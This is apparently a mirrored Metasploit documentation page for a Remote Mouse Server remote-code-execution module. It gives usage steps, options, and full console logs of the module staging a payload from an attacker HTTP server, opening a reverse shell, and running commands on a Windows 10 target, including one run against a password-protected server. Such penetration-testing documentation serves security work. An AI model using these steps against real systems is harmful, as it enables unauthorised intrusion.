CoCalc -- remote_mouse

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/misc/remote_mouse_rce.md
Views: ¹⁹⁰⁴

Vulnerable Application

This module utilizes the Remote Mouse Server by Emote Interactive protocol to deploy a payload and run it from the server on versions < 4.200 (500 server response). This module will deploy a payload regardless if server authentication is required. Tested against 4.110, current at the time of module writing

Version 4.110 can be downloaded from (unofficial site)[https://remote-mouse.en.uptodown.com/windows/download/4546712]

Verification Steps

Install the application
Start msfconsole
Do: use exploit/windows/misc/remote_mouse_rce
Set rhost and lhost as required.
Do: run
You should get a shell as the user who is running Remote Mouse.

Options

SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen. Defaults to 1.

PATH

The path where the payload should be downloaded/staged to. Defaults to c:\\Windows\\Temp\\.

Scenarios

Remote Mouse 4.110 on Windows 10

resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > run

[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49962) at 2022-09-27 16:33:02 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>whoami 
whoami
win10prolicense\windows

C:\Users\windows>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299

Remote Mouse 4.110 on Windows 10, with a password

resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > exploit

[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49975) at 2022-09-27 16:36:09 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\86a4GsbpomvEgUS.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>